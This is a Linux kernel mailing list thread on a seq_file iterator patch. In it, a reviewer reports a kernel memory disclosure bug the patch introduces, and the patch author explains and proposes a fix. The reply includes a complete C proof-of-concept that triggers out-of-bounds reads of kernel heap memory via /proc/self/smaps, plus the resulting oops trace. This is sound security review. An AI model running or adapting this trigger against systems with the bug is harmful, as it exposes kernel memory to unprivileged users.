Message ID | 87y3fcegnn.fsf@notabene.neil.brown.name (mailing list archive) |
---|---|
State | New, archived |
Headers | show |
On Sat, Jul 7, 2018 at 2:11 AM NeilBrown <neilb@suse.com> wrote: > > > The documentation for seq_file suggests that it is necessary to be > able to move the iterator to a given offset, however that is not the > case. If the iterator is stored in the private data and is stable > from one read() syscall to the next, it is only necessary to support > first/next interactions. Implementing this in a client is a little > clumsy. > - if ->start() is given a pos of zero, it should go to start of > sequence. > - if ->start() is given the same pos that was given to the most recent > next() or start(), it should restore the iterator to state just > before that last call > - if ->start is given another number, it should set the iterator one > beyond the start just before the last ->start or ->next call. > > > Also, the documentation says that the implementation can interpret the > pos however it likes (other than zero meaning start), but seq_file > increments the pos sometimes which does impose on the implementation. > > This patch simplifies the interface for first/next iteration and > simplifies the code, while maintaining complete backward > compatibility. Now: > > - if ->start() is given a pos of zero, it should return an iterator > placed at the start of the sequence > - if ->start() is given a non-zero pos, it should return the iterator > in the same state it was after the last ->start or ->next. > > This is particularly useful for iterators which walk the multiple > chains in a hash table, e.g. using rhashtable_walk*. See > fs/gfs2/glock.c and drivers/staging/lustre/lustre/llite/vvp_dev.c > > A large part of achieving this is to *always* call ->next after ->show > has successfully stored all of an entry in the buffer. Never just > increment the index instead. > Also: > - always pass &m->index to ->start() and ->next(), never a temp > variable > - don't clear ->from when ->count is zero, as ->from is dead when > ->count is zero. 
> > > Some ->next functions do not increment *pos when they return NULL. > To maintain compatibility with this, we still need to increment > m->index in one place, if ->next didn't increment it. > Note that such ->next functions are buggy and should be fixed. > A simple demonstration is > dd if=/proc/swaps bs=1000 skip=1 > Choose any block size larger than the size of /proc/swaps. > This will always show the whole last line of /proc/swaps. > > This patch doesn't work around buggy next() functions for this case. > > Acked-by: Jonathan Corbet <corbet@lwn.net> (For the docs part) > Signed-off-by: NeilBrown <neilb@suse.com> > --- > > Still hoping someone might apply this, or at least review it, > or maybe just tell me how insane it is - anything but silence :-( > > NeilBrown [...] > diff --git a/fs/seq_file.c b/fs/seq_file.c > index 4cc090b50cc5..fd82585ab50f 100644 > --- a/fs/seq_file.c > +++ b/fs/seq_file.c [...] > @@ -160,7 +154,6 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > { > struct seq_file *m = file->private_data; > size_t copied = 0; > - loff_t pos; > size_t n; > void *p; > int err = 0; > @@ -223,16 +216,11 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > size -= n; > buf += n; > copied += n; > - if (!m->count) { > - m->from = 0; > - m->index++; > - } > if (!size) > goto Done; > } > /* we need at least one record in buffer */ > - pos = m->index; > - p = m->op->start(m, &pos); > + p = m->op->start(m, &m->index); > while (1) { > err = PTR_ERR(p); > if (!p || IS_ERR(p)) > @@ -243,8 +231,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > if (unlikely(err)) > m->count = 0; > if (unlikely(!m->count)) { > - p = m->op->next(m, p, &pos); > - m->index = pos; > + p = m->op->next(m, p, &m->index); > continue; > } > if (m->count < m->size) > @@ -256,29 +243,33 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > if (!m->buf) > 
goto Enomem; > m->version = 0; > - pos = m->index; > - p = m->op->start(m, &pos); > + p = m->op->start(m, &m->index); > } > m->op->stop(m, p); > m->count = 0; > goto Done; > Fill: > /* they want more? let's try to get some more */ > - while (m->count < size) { > + while (1) { > size_t offs = m->count; > - loff_t next = pos; > - p = m->op->next(m, p, &next); > + loff_t pos = m->index; > + > + p = m->op->next(m, p, &m->index); > + if (pos == m->index) > + /* Buggy ->next function */ > + m->index++; > if (!p || IS_ERR(p)) { > err = PTR_ERR(p); > break; > } > + if (m->count >= size) > + break; > err = m->op->show(m, p); > if (seq_has_overflowed(m) || err) { > m->count = offs; > if (likely(err <= 0)) > break; > } > - pos = next; > } > m->op->stop(m, p); > n = min(m->count, size); > @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > goto Efault; > copied += n; > m->count -= n; > - if (m->count) > - m->from = n; > - else > - pos++; > - m->index = pos; > + m->from = n; This patch introduces a kernel memory disclosure bug when something like the following sequence of events happens (starting from a freshly opened seq file): 1. read(seq_fd, buf, 2000): sets m->from=2000, m->count=100 2. create a buffer broken_buf which consists of 1000 bytes writable memory followed by unmapped memory 3. read(seq_fd, broken_buf, 3100): - flushes buffered data to userspace, result: m->from=2100, m->count=0 - accumulates new data, result: m->from=2100, m->count=3050 - tries to copy new data to userspace, but fails ("goto Efault") 4. 
read(seq_fd, buf, 4096): does copy_to_user(buf, m->buf + m->from, n) I wrote the following crasher to test this: ================== #include <sys/mman.h> #include <err.h> #include <errno.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> int main(void) { // dummy mappings: make sure /proc/self/smaps has lots to say for (int i=0; i<50; i++) { void *mapping = mmap(NULL, 0x2000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (mapping == MAP_FAILED) err(1, "mmap"); if (mprotect(mapping, 0x1000, PROT_NONE)) err(1, "mprotect"); } int fd = open("/proc/self/smaps", O_RDONLY); if (fd == -1) err(1, "open"); char buf[0x1000]; // set m->from = 2000, m->count ~= 100 int first_res = read(fd, buf, 2000); if (first_res != 2000) errx(1, "first res"); // broken_buf: 1000 bytes writable memory followed by unmapped memory char *broken_buf_base = mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (broken_buf_base == MAP_FAILED) err(1, "mmap"); if (mprotect(broken_buf_base+0x1000, 0x1000, PROT_NONE)) err(1, "mprotect"); char *broken_buf = broken_buf_base+0x1000-1000; // set m->from = 2000, m->count ~= 3050 int second_res = read(fd, broken_buf, 3100); printf("second read: %d\n", second_res); if (second_res <= 0 || second_res > 1000) errx(1, "second read didn't partly succeed as expected"); // trigger OOB read read(fd, buf, 0x1000); } ================== Running this against a linux-next build with CONFIG_HARDENED_USERCOPY=y, I reliably get kernel oopses that look as follows: ================== [ 240.215442] usercopy: Kernel memory exposure attempt detected from SLAB object 'kmalloc-4096' (offset 2663, size 2613)! [ 240.215475] ------------[ cut here ]------------ [ 240.215478] kernel BUG at mm/usercopy.c:100! 
[ 240.215491] invalid opcode: 0000 [#1] SMP KASAN PTI [ 240.215500] CPU: 1 PID: 968 Comm: seq_read_trigge Not tainted 4.18.0-rc3-next-20180706 #37 [ 240.215506] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 240.215540] RIP: 0010:usercopy_abort+0x69/0x80 [ 240.215544] Code: 44 d0 53 48 c7 c0 60 98 ae 92 51 48 c7 c6 e0 97 ae 92 41 53 48 89 f9 48 0f 45 f0 4c 89 d2 48 c7 c7 80 99 ae 92 e8 e0 2d dc ff <0f> 0b 49 c7 c1 20 97 ae 92 4d 89 cb 4d 89 c8 eb a5 66 0f 1f 44 00 [ 240.215615] RSP: 0018:ffff8801d0a47bf8 EFLAGS: 00010286 [ 240.215621] RAX: 000000000000006b RBX: 0000000000000a35 RCX: ffffffff911c883e [ 240.215627] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff8801ec3261cc [ 240.215632] RBP: ffffea00079e2800 R08: ffffed003d864f29 R09: ffffed003d864f29 [ 240.215637] R10: ffffffff92ae9820 R11: ffffed003d864f28 R12: 0000000000000a35 [ 240.215643] R13: 0000000000000001 R14: ffff8801e78a1ddc R15: ffffea00079e2800 [ 240.215649] FS: 00007f820d397700(0000) GS:ffff8801ec300000(0000) knlGS:0000000000000000 [ 240.215655] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 240.215660] CR2: 00007f820cf4f4c4 CR3: 00000001e7868003 CR4: 00000000001606e0 [ 240.215668] Call Trace: [ 240.215680] __check_heap_object+0xb3/0xc0 [ 240.215691] __check_object_size+0xdc/0x240 [ 240.215702] ? check_stack_object+0x21/0x60 [ 240.215722] seq_read+0x3d8/0x6a0 [ 240.215740] ? ldsem_up_read+0x13/0x40 [ 240.215750] __vfs_read+0xc4/0x370 [ 240.215758] ? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 240.215768] ? vma_compute_subtree_gap+0x95/0xc0 [ 240.215775] ? vma_gap_callbacks_rotate+0x37/0x50 [ 240.215785] ? fsnotify+0x895/0x8e0 [ 240.215794] ? fsnotify+0x895/0x8e0 [ 240.215806] ? __fsnotify_inode_delete+0x20/0x20 [ 240.215816] vfs_read+0xa5/0x190 [ 240.215823] ksys_read+0xa1/0x120 [ 240.215830] ? kernel_write+0xa0/0xa0 [ 240.215847] ? 
mm_fault_error+0x1b0/0x1b0 [ 240.215858] do_syscall_64+0x73/0x160 [ 240.215874] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 240.215881] RIP: 0033:0x7f820cecf700 [ 240.215885] Code: b6 fe ff ff 48 8d 3d 87 be 08 00 48 83 ec 08 e8 06 db 01 00 66 0f 1f 44 00 00 83 3d 49 30 2c 00 00 75 10 b8 00 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 de 9b 01 00 48 89 04 24 [ 240.215955] RSP: 002b:00007ffffbcb56a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [ 240.215962] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f820cecf700 [ 240.215967] RDX: 0000000000001000 RSI: 00007ffffbcb56b0 RDI: 0000000000000003 [ 240.215972] RBP: 00007ffffbcb66e0 R08: 0000000000000001 R09: 0000000000000011 [ 240.215977] R10: 0000000000000064 R11: 0000000000000246 R12: 0000558430e72730 [ 240.215982] R13: 00007ffffbcb67c0 R14: 0000000000000000 R15: 0000000000000000 [ 240.215988] Modules linked in: [ 240.215996] ---[ end trace a76025513bde017a ]--- [ 240.216004] RIP: 0010:usercopy_abort+0x69/0x80 [ 240.216007] Code: 44 d0 53 48 c7 c0 60 98 ae 92 51 48 c7 c6 e0 97 ae 92 41 53 48 89 f9 48 0f 45 f0 4c 89 d2 48 c7 c7 80 99 ae 92 e8 e0 2d dc ff <0f> 0b 49 c7 c1 20 97 ae 92 4d 89 cb 4d 89 c8 eb a5 66 0f 1f 44 00 [ 240.216076] RSP: 0018:ffff8801d0a47bf8 EFLAGS: 00010286 [ 240.216082] RAX: 000000000000006b RBX: 0000000000000a35 RCX: ffffffff911c883e [ 240.216087] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff8801ec3261cc [ 240.216092] RBP: ffffea00079e2800 R08: ffffed003d864f29 R09: ffffed003d864f29 [ 240.216098] R10: ffffffff92ae9820 R11: ffffed003d864f28 R12: 0000000000000a35 [ 240.216103] R13: 0000000000000001 R14: ffff8801e78a1ddc R15: ffffea00079e2800 [ 240.216109] FS: 00007f820d397700(0000) GS:ffff8801ec300000(0000) knlGS:0000000000000000 [ 240.216114] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 240.216119] CR2: 00007f820cf4f4c4 CR3: 00000001e7868003 CR4: 00000000001606e0 ================== (I first started staring at this code because Kees pointed me to 
https://syzkaller.appspot.com/bug?extid=4b712dce5cbce6700f27 , but I think the case I found doesn't quite match what syzkaller is saying?)
On Sat, Jul 07 2018, Jann Horn wrote: >> @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) >> goto Efault; >> copied += n; >> m->count -= n; >> - if (m->count) >> - m->from = n; >> - else >> - pos++; >> - m->index = pos; >> + m->from = n; > > This patch introduces a kernel memory disclosure bug when something > like the following sequence of events happens (starting from a freshly > opened seq file): > > 1. read(seq_fd, buf, 2000): sets m->from=2000, m->count=100 > 2. create a buffer broken_buf which consists of 1000 bytes writable > memory followed by unmapped memory > 3. read(seq_fd, broken_buf, 3100): > - flushes buffered data to userspace, result: m->from=2100, m->count=0 > - accumulates new data, result: m->from=2100, m->count=3050 > - tries to copy new data to userspace, but fails ("goto Efault") > 4. read(seq_fd, buf, 4096): does copy_to_user(buf, m->buf + m->from, n) Thanks for testing and for the report. I think I see where I went wrong in the patch. As I said in the description: - don't clear ->from when ->count is zero, as ->from is dead when ->count is zero. It is true that ->from is dead when ->count is zero, but as soon as count becomes non-zero, ->from becomes important again. So we either need to clear ->from whenever ->count is changed from zero (which would be clumsy and error prone) or we need to clear ->from somewhere else. ->count is only increased in ->show() calls and there are three ->show() calls. - in traverse() ->from is set to zero early, and set once more shortly before the function exits, so it is always correct. - in "we need at least one record in buffer" ->count starts at zero so ->from needs to be set to zero as well. - in "Fill:" ->from is still correct from previous setting. So I think we just need m->from = 0; at "we need at least one record in buffer". I'm fairly sure that will fix the problem you found. I would appreciate it if you would test and confirm. 
I'll send a patch separately. Thanks again, NeilBrown
diff --git a/Documentation/filesystems/seq_file.txt b/Documentation/filesystems/seq_file.txt index 9de4303201e1..d412b236a9d6 100644 --- a/Documentation/filesystems/seq_file.txt +++ b/Documentation/filesystems/seq_file.txt @@ -66,23 +66,39 @@ kernel 3.10. Current versions require the following update The iterator interface -Modules implementing a virtual file with seq_file must implement a simple -iterator object that allows stepping through the data of interest. -Iterators must be able to move to a specific position - like the file they -implement - but the interpretation of that position is up to the iterator -itself. A seq_file implementation that is formatting firewall rules, for -example, could interpret position N as the Nth rule in the chain. -Positioning can thus be done in whatever way makes the most sense for the -generator of the data, which need not be aware of how a position translates -to an offset in the virtual file. The one obvious exception is that a -position of zero should indicate the beginning of the file. +Modules implementing a virtual file with seq_file must implement an +iterator object that allows stepping through the data of interest +during a "session" (roughly one read() system call). If the iterator +is able to move to a specific position - like the file they implement, +though with freedom to map the position number to a sequence location +in whatever way is convenient - the iterator need only exist +transiently during a session. If the iterator cannot easily find a +numerical position but works well with a first/next interface, the +iterator can be stored in the private data area and continue from one +session to the next. + +A seq_file implementation that is formatting firewall rules from a +table, for example, could provide a simple iterator that interprets +position N as the Nth rule in the chain. 
A seq_file implementation +that presents the content of a, potentially volatile, linked list +might record a pointer into that list, providing that can be done +without risk of the current location being removed. + +Positioning can thus be done in whatever way makes the most sense for +the generator of the data, which need not be aware of how a position +translates to an offset in the virtual file. The one obvious exception +is that a position of zero should indicate the beginning of the file. The /proc/sequence iterator just uses the count of the next number it will output as its position. -Four functions must be implemented to make the iterator work. The first, -called start() takes a position as an argument and returns an iterator -which will start reading at that position. For our simple sequence example, +Four functions must be implemented to make the iterator work. The +first, called start(), starts a session and takes a position as an +argument, returning an iterator which will start reading at that +position. The pos passed to start() will always be either zero, or +the most recent pos used in the previous session. + +For our simple sequence example, the start() function looks like: static void *ct_seq_start(struct seq_file *s, loff_t *pos) @@ -101,11 +117,12 @@ implementations; in most cases the start() function should check for a "past end of file" condition and return NULL if need be. For more complicated applications, the private field of the seq_file -structure can be used. There is also a special value which can be returned -by the start() function called SEQ_START_TOKEN; it can be used if you wish -to instruct your show() function (described below) to print a header at the -top of the output. SEQ_START_TOKEN should only be used if the offset is -zero, however. +structure can be used to hold state from session to session. 
There is +also a special value which can be returned by the start() function +called SEQ_START_TOKEN; it can be used if you wish to instruct your +show() function (described below) to print a header at the top of the +output. SEQ_START_TOKEN should only be used if the offset is zero, +however. The next function to implement is called, amazingly, next(); its job is to move the iterator forward to the next position in the sequence. The @@ -121,9 +138,13 @@ complete. Here's the example version: return spos; } -The stop() function is called when iteration is complete; its job, of -course, is to clean up. If dynamic memory is allocated for the iterator, -stop() is the place to free it. +The stop() function closes a session; its job, of course, is to clean +up. If dynamic memory is allocated for the iterator, stop() is the +place to free it; if a lock was taken by start(), stop() must release +that lock. The value that *pos was set to by the last next() call +before stop() is remembered, and used for the first start() call of +the next session unless lseek() has been called on the file; in that +case next start() will be asked to start at position zero. 
static void ct_seq_stop(struct seq_file *s, void *v) { diff --git a/fs/seq_file.c b/fs/seq_file.c index 4cc090b50cc5..fd82585ab50f 100644 --- a/fs/seq_file.c +++ b/fs/seq_file.c @@ -90,23 +90,22 @@ EXPORT_SYMBOL(seq_open); static int traverse(struct seq_file *m, loff_t offset) { - loff_t pos = 0, index; + loff_t pos = 0; int error = 0; void *p; m->version = 0; - index = 0; + m->index = 0; m->count = m->from = 0; - if (!offset) { - m->index = index; + if (!offset) return 0; - } + if (!m->buf) { m->buf = seq_buf_alloc(m->size = PAGE_SIZE); if (!m->buf) return -ENOMEM; } - p = m->op->start(m, &index); + p = m->op->start(m, &m->index); while (p) { error = PTR_ERR(p); if (IS_ERR(p)) @@ -123,20 +122,15 @@ static int traverse(struct seq_file *m, loff_t offset) if (pos + m->count > offset) { m->from = offset - pos; m->count -= m->from; - m->index = index; break; } pos += m->count; m->count = 0; - if (pos == offset) { - index++; - m->index = index; + p = m->op->next(m, p, &m->index); + if (pos == offset) break; - } - p = m->op->next(m, p, &index); } m->op->stop(m, p); - m->index = index; return error; Eoverflow: @@ -160,7 +154,6 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) { struct seq_file *m = file->private_data; size_t copied = 0; - loff_t pos; size_t n; void *p; int err = 0; @@ -223,16 +216,11 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) size -= n; buf += n; copied += n; - if (!m->count) { - m->from = 0; - m->index++; - } if (!size) goto Done; } /* we need at least one record in buffer */ - pos = m->index; - p = m->op->start(m, &pos); + p = m->op->start(m, &m->index); while (1) { err = PTR_ERR(p); if (!p || IS_ERR(p)) @@ -243,8 +231,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) if (unlikely(err)) m->count = 0; if (unlikely(!m->count)) { - p = m->op->next(m, p, &pos); - m->index = pos; + p = m->op->next(m, p, &m->index); continue; } if (m->count < 
m->size) @@ -256,29 +243,33 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) if (!m->buf) goto Enomem; m->version = 0; - pos = m->index; - p = m->op->start(m, &pos); + p = m->op->start(m, &m->index); } m->op->stop(m, p); m->count = 0; goto Done; Fill: /* they want more? let's try to get some more */ - while (m->count < size) { + while (1) { size_t offs = m->count; - loff_t next = pos; - p = m->op->next(m, p, &next); + loff_t pos = m->index; + + p = m->op->next(m, p, &m->index); + if (pos == m->index) + /* Buggy ->next function */ + m->index++; if (!p || IS_ERR(p)) { err = PTR_ERR(p); break; } + if (m->count >= size) + break; err = m->op->show(m, p); if (seq_has_overflowed(m) || err) { m->count = offs; if (likely(err <= 0)) break; } - pos = next; } m->op->stop(m, p); n = min(m->count, size); @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) goto Efault; copied += n; m->count -= n; - if (m->count) - m->from = n; - else - pos++; - m->index = pos; + m->from = n; Done: if (!copied) copied = err;